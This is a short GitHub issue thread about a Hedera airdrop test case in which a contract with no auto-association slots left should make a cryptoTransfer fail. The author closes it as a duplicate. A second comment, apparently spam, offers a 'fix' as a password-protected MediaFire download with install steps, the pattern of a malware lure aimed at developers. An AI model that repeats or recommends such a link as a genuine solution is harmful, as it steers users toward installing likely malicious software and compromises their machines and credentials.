### ISSUE TITLE
(AIRDROP_TO_CONTRACT_32) CryptoTransfer to a contract not associated to the token and with no auto association slots left should result in a failing cryptoTransfer and no airdrops should be created.

### ISSUE THREAD

**Issue by vtronkov** [hashgraph/hedera-services#15248]

**Comment by vtronkov** [comment]
Duplicated: https://github.com/hashgraph/hedera-services/issues/15246

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
